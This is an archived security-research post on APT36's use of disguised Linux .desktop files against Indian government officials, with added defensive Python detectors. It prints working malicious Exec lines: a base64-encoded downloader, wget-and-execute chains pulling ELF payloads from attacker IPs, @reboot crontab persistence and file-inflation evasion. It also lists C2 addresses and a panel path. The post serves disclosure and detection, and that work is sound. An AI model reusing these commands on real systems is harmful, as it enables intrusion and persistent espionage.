APT36's Updated Arsenal | ThreatLabz
By Sudeep Singh
Published: 2023-09-12 · Archived: 2026-04-02 12:20:45 UTC

Malicious Linux Desktop Entry Files as New Attack Vectors

The use of Linux desktop entry files by APT36 as an attack vector has never been documented before. This attack vector is fairly new and appears to be used in very low-volume attacks. So far, our research team has discovered three samples, all of which have 0 detections on VirusTotal. We first observed an occurrence in May 2023, when a credential phishing website used to target Indian government employees was also found to be hosting a redirector that distributed ZIP archives containing malicious Linux desktop entry files.

National Informatics Center (NIC), India Phishing Attack - May 2023

In May 2023, we discovered a credential phishing site, email9ov[.]in, targeting Indian government officials by masquerading as the official login portal of the National Informatics Center (NIC), India. We notified NIC in May 2023 about this website and the associated threat intel. We also noticed that the same phishing website was using the URL hxxps://email9ov[.]in/VISIT_OF_MEDICAL to redirect visitors to hxxp://103.2.232[.]82:8081/Tri-Service-Exercise/Delegation_Saudi_Arabia.zip. From there, a visitor would download a ZIP archive containing a maliciously crafted Linux desktop entry file.
Here are some technical details about this case:

ZIP archive MD5 hash: 9c66f8c0c970822985600bed04e56434
ZIP filename: Delegation_Saudi_Arabia.zip
Desktop entry file MD5 hash: f27a4968af4ed64baef8e086516e86ac
Desktop entry filename: Delegation_Saudi_Arabia.desktop

Desktop entry file analysis

We found the following content in the desktop entry file:

[Desktop Entry]
Encoding=UTF-8
Name=Delegation_Saudi_Arabia.pdf
Exec=sh -c "echo 'L3Vzci9iaW4vd2dldCAnaHR0cDovLzEwMy4yLjIzMi44Mjo4MDgxL1RyaS1TZXJ2aWNlLUV4ZXJjaXNlL0RlbGVnYXRpb25fU2F1ZGlfQXJhYmlhLnBkZicgLU8gL3RtcC9EZWxlZ2F0aW9uX1NhdWRpX0FyYWJpYS5wZGY7IC91c3IvYmluL3dnZXQgJ2h0dHA6Ly8xMDMuMi4yMzIuODI6ODA4MS9JU0VQQy0xMi0yMDIzLUFnZW5kYS1mb3ItbWVldGluZy8xODUnIC1PIC90bXAvMTg1LmVsZjsgY2QgL3RtcDsgY2htb2QgK3ggMTg1LmVsZjtsaWJyZW9mZmljZSAvdG1wL0RlbGVnYXRpb25fU2F1ZGlfQXJhYmlhLnBkZiB8IC4vMTg1LmVsZg==' | base64 -d | sh"
Terminal=false
Type=Application
Icon=x-office-document

The icon of this desktop entry file is set to "x-office-document" so that it looks like an innocuous Office document. The base64-encoded command inside the desktop entry file decodes to:

/usr/bin/wget 'hxxp://103.2.232[.]82:8081/Tri-Service-Exercise/Delegation_Saudi_Arabia.pdf' -O /tmp/Delegation_Saudi_Arabia.pdf; /usr/bin/wget 'hxxp://103.2.232[.]82:8081/ISEPC-12-2023-Agenda-for-meeting/185' -O /tmp/185.elf; cd /tmp; chmod +x 185.elf;libreoffice /tmp/Delegation_Saudi_Arabia.pdf | ./185

The decoded command performs the following actions:

1. Downloads the decoy PDF and saves it in the /tmp directory with the filename Delegation_Saudi_Arabia.pdf.
2. Downloads the Linux payload and saves it in the /tmp directory with the filename 185.elf.
3. Marks the Linux binary as executable.
4. Uses LibreOffice to open and display the decoy PDF file.
5. Executes the Linux payload.
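The desktop entry above hides its real command behind an inline base64 blob, while its Name and Icon claim to be a PDF. The following Python script is an added example for analysts, not code from the ThreatLabz post: it parses the [Desktop Entry] group, statically unwraps an `echo '<base64>' | base64 -d | sh` stage in Exec without executing anything, and reports the mismatches worth looking for (a document-like Name and document icon on an entry whose Type is Application, a downloader, chmod +x, and execution out of /tmp or via a relative path). The embedded sample is constructed to mirror the structure of the real file; its hostnames and file names are placeholders, not the indicators from the post.

```python
import base64
import re

# Constructed sample modelled on the structure of the desktop entry discussed
# above. The hostnames and file names are placeholders, not real indicators.
INNER_COMMAND = (
    "/usr/bin/wget 'http://decoy.example.invalid/Delegation_Report.pdf' -O /tmp/Delegation_Report.pdf; "
    "/usr/bin/wget 'http://payload.example.invalid/agenda/185' -O /tmp/185.elf; "
    "cd /tmp; chmod +x 185.elf; libreoffice /tmp/Delegation_Report.pdf | ./185.elf"
)
SAMPLE_DESKTOP = (
    "[Desktop Entry]\n"
    "Encoding=UTF-8\n"
    "Name=Delegation_Report.pdf\n"
    "Exec=sh -c \"echo '" + base64.b64encode(INNER_COMMAND.encode()).decode() + "' | base64 -d | sh\"\n"
    "Terminal=false\n"
    "Type=Application\n"
    "Icon=x-office-document\n"
)
# An ordinary launcher for comparison (also constructed).
BENIGN_DESKTOP = (
    "[Desktop Entry]\nType=Application\nName=Firefox Web Browser\n"
    "Exec=firefox %u\nIcon=firefox\nTerminal=false\n"
)

DOCUMENT_SUFFIXES = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt")
DOCUMENT_ICONS = {"x-office-document", "application-pdf", "application-msword"}
# Matches: echo '<base64>' | base64 -d | sh   (quotes optional, -d or --decode, sh or bash)
B64_STAGE = re.compile(
    r"echo\s+['\"]?([A-Za-z0-9+/=]{16,})['\"]?\s*\|\s*base64\s+(?:-d|--decode)\s*\|\s*(?:sh|bash)\b"
)


def parse_desktop_entry(text: str) -> dict:
    """Return the key/value pairs of the [Desktop Entry] group.

    Comment lines (#) and other groups are skipped, so '#' padding does not
    change what the parser sees.
    """
    entries = {}
    in_group = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, _, value = line.partition("=")
            entries[key.strip()] = value.strip()
    return entries


def decode_exec_stage(exec_value: str):
    """If Exec pipes an inline base64 blob into a shell, return the decoded command, else None."""
    m = B64_STAGE.search(exec_value)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError: not valid base64 after all
        return None


def assess(text: str) -> dict:
    """Summarise why a desktop entry deserves a second look, without running anything."""
    entry = parse_desktop_entry(text)
    exec_value = entry.get("Exec", "")
    decoded = decode_exec_stage(exec_value)
    effective = decoded if decoded is not None else exec_value
    findings = []
    if entry.get("Type") == "Application" and entry.get("Name", "").lower().endswith(DOCUMENT_SUFFIXES):
        findings.append("Name looks like a document but Type=Application")
    if entry.get("Icon") in DOCUMENT_ICONS and exec_value:
        findings.append("document icon on an entry that runs a command")
    if decoded is not None:
        findings.append("base64-decoded shell stage in Exec")
    if re.search(r"\b(?:wget|curl)\b", effective):
        findings.append("command downloads content")
    if re.search(r"\bchmod\s+\+x\b", effective):
        findings.append("command marks a downloaded file executable")
    if re.search(r"(?:^|[;&|])\s*(?:\./|/tmp/)\S+", effective):
        findings.append("command runs a file from /tmp or by relative path")
    return {"entry": entry, "decoded_exec": decoded, "findings": findings}


if __name__ == "__main__":
    for label, text in (("sample", SAMPLE_DESKTOP), ("benign", BENIGN_DESKTOP)):
        result = assess(text)
        print(label, "decoded Exec:", result["decoded_exec"])
        for finding in result["findings"]:
            print("  -", finding)
```

The decoder deliberately stops at one stage: it shows what the shell would have run, and an analyst decides what to do with the URLs it exposes. Feed it the contents of any .desktop file found in a ZIP attachment, a Downloads folder or ~/.local/share/applications.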
In this case, the Linux payload was a cross-platform binary designed to run on both Linux and WSL (Windows Subsystem for Linux) machines. Since it did not contain a fully functional C2 mechanism at the time of analysis, we believe it was still in a development phase and was used by the threat actor as an initial test. To read about the “Lee” agent’s cross-platform capabilities, visit the Lumen blog.

The content of the decoy PDF file is displayed in the image below.

Figure 5: Decoy PDF displayed to the user.

The PDF appears to be a document from the Indian Ministry of Defence describing the visit of a nine-member delegation from Saudi Arabia, during which they discussed issues with Indian Armed Forces medical officials.

Inflated File Attack - June 2023

Beginning in June 2023, we detected APT36 establishing their operational infrastructure on a server with the IP address 153.92.220.59. The threat actor proceeded to register multiple domains hosted on this IP. Further insight into this attacker-controlled infrastructure is available in the Threat Actor Infrastructure section. In August, we noted a significant development: a few of these domains served as the hosting platform for decoy PDF files. These PDFs were linked from the malicious Linux desktop entry files, which the threat actor distributed enclosed in ZIP archives.

Here are some technical details about this case:

ZIP archive MD5 hash: 36b19ca8737c63b9c9a3365ff4968ef5
ZIP filename: Meeting_agenda.zip
Desktop entry file MD5 hash: 65167974b397493fce320005916a13e9
Desktop entry filename: approved_copy.desktop

Desktop entry file analysis

The first anomaly we observed was the large size of the Linux desktop entry file. A size larger than 1 MB is rare for a Linux desktop entry file.
Reviewing the file revealed that the threat actor inflated its size by adding more than a million "#" characters. We believe this was an attempt by the threat actor to bypass security scanning solutions. The image below shows the extra characters added to the inflated Linux desktop entry file.

Figure 6: The inflated Linux desktop entry file.

The relevant content from the Linux desktop entry file is shown below.

[Desktop Entry]
Type=Application
Name=approved_copy.pdf
Exec=bash -c "xdg-open 'https://admin-dept[.]in//approved_copy.pdf' && mkdir -p ~/.local/share && wget 64.227.133[.]222/zswap-xbusd -O ~/.local/share/zswap-xbusd && chmod +x ~/.local/share/zswap-xbusd; echo '@reboot ~/.local/share/zswap-xbusd'>>/dev/shm/myc.txt; crontab -u `whoami` /dev/shm/myc.txt; rm /dev/shm/myc.txt; ~/.local/share/zswap-xbusd"
Icon=application-pdf
Name[en_US]=approved_copy.desktop

This desktop file performs these main operations:

1. Downloads the decoy PDF file from the URL https://admin-dept[.]in/approved_copy.pdf and displays it to the victim. This decoy file contains an error message to distract the user. Figure 7 shows that the icon of this desktop file is set to application-pdf, which is done to disguise the malware as an innocuous file.
2. Creates a hidden directory path, .local/share, in the user's home directory.
3. Downloads the Linux payload from the URL 64.227.133[.]222/zswap-xbusd using wget and saves it as zswap-xbusd in the previously created hidden directory.
4. Writes a short shell script to the file /dev/shm/myc.txt. The shell script reboots the machine and then launches the Linux payload.
5. Sets up a cron job under the current username to run the contents of the /dev/shm/myc.txt script.
6. Deletes the shell script.
7. Executes the Linux payload.

Figure 7: The icon of the desktop configuration file is set to PDF to make it more convincing.
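For the inflated entry above and the cron-based persistence it sets up, here is an added triage script written for this page (not ThreatLabz code). It measures how much of a .desktop file is "#" padding, pulls the persistence indicators out of the Exec line, and checks a user's `crontab -l` output for `@reboot` entries that point into user-writable paths; crontab's `@reboot` schedule runs the listed command each time the system boots, which is what lets the dropped binary survive a restart. The 1 MB threshold follows the post's observation that larger desktop entries are rare; the sample file and crontab text are constructed, and the hostnames and the svc-helper binary name are placeholders.

```python
import re

# The post notes that a desktop entry larger than 1 MB is rare; this example
# uses that as its size threshold (an assumption to tune per environment).
INFLATION_MIN_BYTES = 1024 * 1024
PADDING_RATIO_ALERT = 0.9

# Indicators drawn from the Exec line discussed above, keyed by a finding label.
EXEC_INDICATORS = {
    "cron @reboot persistence": re.compile(r"@reboot"),
    "crontab invoked": re.compile(r"\bcrontab\b"),
    "staging file in /dev/shm": re.compile(r"/dev/shm/\S+"),
    "payload dropped under ~/.local/share": re.compile(r"~/\.local/share/\S+"),
    "downloader in command": re.compile(r"\b(?:wget|curl)\b"),
    "decoy opened with xdg-open": re.compile(r"\bxdg-open\b"),
}

# Constructed Exec line mirroring the sequence above; hosts and the binary
# name (svc-helper) are placeholders, not the real indicators.
SAMPLE_EXEC = (
    "bash -c \"xdg-open 'https://decoy.example.invalid/approved_copy.pdf' && mkdir -p ~/.local/share "
    "&& wget payload.example.invalid/svc-helper -O ~/.local/share/svc-helper "
    "&& chmod +x ~/.local/share/svc-helper; echo '@reboot ~/.local/share/svc-helper'>>/dev/shm/myc.txt; "
    "crontab -u `whoami` /dev/shm/myc.txt; rm /dev/shm/myc.txt; ~/.local/share/svc-helper\""
)
BENIGN_DESKTOP = b"[Desktop Entry]\nType=Application\nName=Text Editor\nExec=gedit %U\nIcon=gedit\n"
# Constructed `crontab -l` output with one suspicious and one ordinary entry.
SAMPLE_CRONTAB = "@reboot ~/.local/share/svc-helper\n0 2 * * * /usr/bin/backup.sh\n"


def build_sample(padding_lines: int) -> bytes:
    """Build a desktop entry padded with '#' comment lines, as the inflated sample was."""
    head = "[Desktop Entry]\nType=Application\nName=approved_copy.pdf\n"
    pad = ("#" * 79 + "\n") * padding_lines
    tail = "Exec=" + SAMPLE_EXEC + "\nIcon=application-pdf\nName[en_US]=approved_copy.desktop\n"
    return (head + pad + tail).encode()


def triage(data: bytes) -> dict:
    """Score a .desktop file: size, share of '#' padding, and persistence indicators in Exec."""
    text = data.decode("utf-8", "replace")
    ratio = data.count(b"#") / max(len(data), 1)
    m = re.search(r"^Exec=(.*)$", text, re.MULTILINE)
    exec_value = m.group(1) if m else ""
    findings = [label for label, pat in EXEC_INDICATORS.items() if pat.search(exec_value)]
    if len(data) >= INFLATION_MIN_BYTES:
        findings.append("oversized desktop entry (%d bytes)" % len(data))
    if ratio >= PADDING_RATIO_ALERT:
        findings.append("%.0f%% of the file is '#' padding" % (ratio * 100))
    return {"size": len(data), "padding_ratio": ratio, "exec": exec_value, "findings": findings}


def suspicious_cron_lines(crontab_text: str) -> list:
    """Return @reboot entries whose command lives in a user-writable location."""
    writable = re.compile(r"(?:^|\s)(?:~/|/home/|/tmp/|/dev/shm/|/var/tmp/)")
    return [
        line for line in crontab_text.splitlines()
        if line.startswith("@reboot") and writable.search(line)
    ]


if __name__ == "__main__":
    for label, blob in (("inflated", build_sample(15000)), ("benign", BENIGN_DESKTOP)):
        result = triage(blob)
        print(label, result["size"], "bytes,", "%.1f%% padding" % (result["padding_ratio"] * 100))
        for finding in result["findings"]:
            print("  -", finding)
    print("suspicious crontab lines:", suspicious_cron_lines(SAMPLE_CRONTAB))
```

The padding ratio is computed on raw bytes rather than parsed keys on purpose: the desktop entry parser discards comment lines, so the inflation is only visible if the file is inspected before parsing. On a live host, the same `suspicious_cron_lines` check can be run over the output of `crontab -l` for each user.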
At the time of our analysis, the server 64.227.133[.]222 was not serving the Linux payload. We continued monitoring this infrastructure and noticed that on Aug 29, 2023, a new domain called admin-br[.]in was registered and used to distribute a new Linux desktop entry file. In this instance, we were able to retrieve the payloads and conclude the attribution to APT36.

Here is the metadata of the new Linux desktop entry file:

MD5 hash: 574013c4a22ca2d8d8c76e65ef5e8059
Filename: approved_copy.desktop

The relevant content from the Linux desktop entry file is shown below.

[Desktop Entry]
Type=Application
Name=approved_copy.pdf
Exec=bash -c "xdg-open 'https://admin-br[.]in//approved_copy.pdf' && mkdir -p ~/.local/share && wget 64.227.138[.]127/4200f0916f146d2ac5448e91a3afe1b3/pickle-help -O ~/.local/share/pickle-help && chmod +x ~/.local/share/pickle-help;~/.local/share/pickle-help >/dev/null 2>&1 & sleep 5; wget 134.209.159[.]9/4200f0916f146d2ac5448e91a3afe1b3/ziputils-help -O ~/.local/share/ziputils-help && chmod +x ~/.local/share/ziputils-help; echo '@reboot ~/.local/share/ziputils-help'>>/dev/shm/myc.txt;echo '@reboot ~/.local/share/ziputils-help'>>/dev/shm/myc.txt; crontab -u `whoami` /dev/shm/myc.txt; rm /dev/shm/myc.txt;~/.local/share/ziputils-help &"
Icon=application-pdf
Name[en_US]=approved_copy.desktop

The functionality of this file is similar to that of the previous Linux desktop entry file. The image below shows a decoy PDF file displaying an error message stating “Failed to load the PDF document”. This is used to distract the user while malicious activities occur in the background.

Figure 8: The decoy PDF file displayed to the user.
In this case, the Linux desktop entry file retrieves the malicious Linux payloads from the servers at:

64.227.138[.]127
134.209.159[.]9

The two files retrieved are cleverly named to disguise themselves as legitimate software utilities. Here is the metadata of the Linux payloads:

MD5 hash: 98279047a7db080129e5ec84533822ef
Filename: pickle-help

MD5 hash: 248d4e6bb0f32afd7a1cfb975910235a
Filename: ziputils-help

A quick technical analysis identified these Linux payloads as Mythic Poseidon binaries. Since Mythic is an open-source framework that is well documented on GitHub, we will not explore its technical details in this blog. The C2 servers extracted from each malicious Linux payload are listed below.

Table 2: C2 servers from the malicious Linux payloads

C2 IP address     | Port
108.61.163[.]195  | 7443
64.176.40[.]100   | 7443

The C2 panel for Mythic Poseidon can be accessed by visiting the URI path /new/login on the server running at port 7443. For instance, the C2 panel for 108.61.163[.]195 can be accessed at hxxps://108.61.163[.]195:7443/new/login.

Figure 9: The Mythic C2 panel for the Poseidon binary.

Source: https://www.zscaler.com/blogs/security-research/peek-apt36-s-updated-arsenal